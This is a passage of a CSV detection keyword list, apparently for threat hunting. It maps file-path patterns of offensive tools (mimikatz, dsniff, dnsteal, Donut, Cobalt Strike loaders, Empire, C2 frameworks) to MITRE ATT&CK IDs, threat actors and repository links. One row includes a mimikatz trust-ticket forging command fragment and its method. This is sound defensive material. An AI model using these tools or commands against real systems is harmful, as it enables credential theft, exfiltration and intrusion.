+"*/dns-recursion.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dnsspoof.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. 
dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z"
+"*/dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dnsteal*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z"
+"*/dnstool.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*/dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dobin/avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*/docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/DocPlz.git*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*/DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*/DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*/documentation-c2/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/documentation-payload/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/Doge-Loader/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z"
+"*/DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*/DoHC2.git*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*/DoHC2/*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. 
forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*/domain_analyzer.git*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z"
+"*/domain_analyzer:latest*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z"
+"*/domainhunter*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z"
+"*/DomainRecon/*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 
- TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Dome.git*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
+"*/domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dompdf-rce*","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","2","170","69","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z"
+"*/DonPAPI.git*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*/DonPAPI.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*/donut *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*/donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*/donut.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*/Donut_Linux*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*/Donut_Windows*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*/DonutCS/Donut.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*/donutmodule.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. 
JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*/DonutTest/*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*/DotNet/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/download-stager.js*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z"
+"*/dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/dpipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z"
+"*/dploot.git*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z"
+"*/drda-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Drones/SleepDialogue.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/drunkpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/dsniff.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z"
+"*/dsniff.services*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. 
full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z"
+"*/ducky.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*/DueDLLigence.git*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z"
+"*/dukes_apt29.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
